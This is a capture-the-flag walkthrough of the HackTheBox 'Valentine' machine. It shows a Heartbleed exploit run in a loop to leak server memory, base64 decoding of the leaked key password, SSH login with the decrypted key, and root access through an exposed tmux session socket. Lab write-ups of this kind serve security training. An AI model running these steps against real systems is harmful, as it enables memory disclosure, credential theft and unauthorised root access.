Htb Valentine Linux | hackthebox

NETWORK

Looking into the http port 80 we can see the following

Looking into the items revealed by the directories scans

Let’s go ahead and download this key into our attack machine

Trying to use this key to access the server, we get asked for a password

Looking into the headers exposed by the website, we can see that we are dealing with very old version of Apache and PHP

We then decide to look around the heartbleed vulnerability

Using the exploit found on exploit-db , we can confirm that our machine is vulnerable to Heartbleed

Let’s collect more data

for i in $(seq 1 10000); do python2 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" > heartbeat-$i; done

We used fdupes to remove duplicates

fdupes -rf . | grep -v '^$' > files; xargs -a files rm -v

cat heartbeat-* | awk -F" " '{print $18}'

decoding this base64 data we then found the private key password

echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype

openssl rsa -in hype_key -out hype_key_decrypted

Using the ssh key and the password from the previous steps, we are now into an SSH session on the server as user hype

Looking into the .bash_history we can see the use of the command tmux

running the following command gave us the root shell

tmux -S /.devs/dev_sess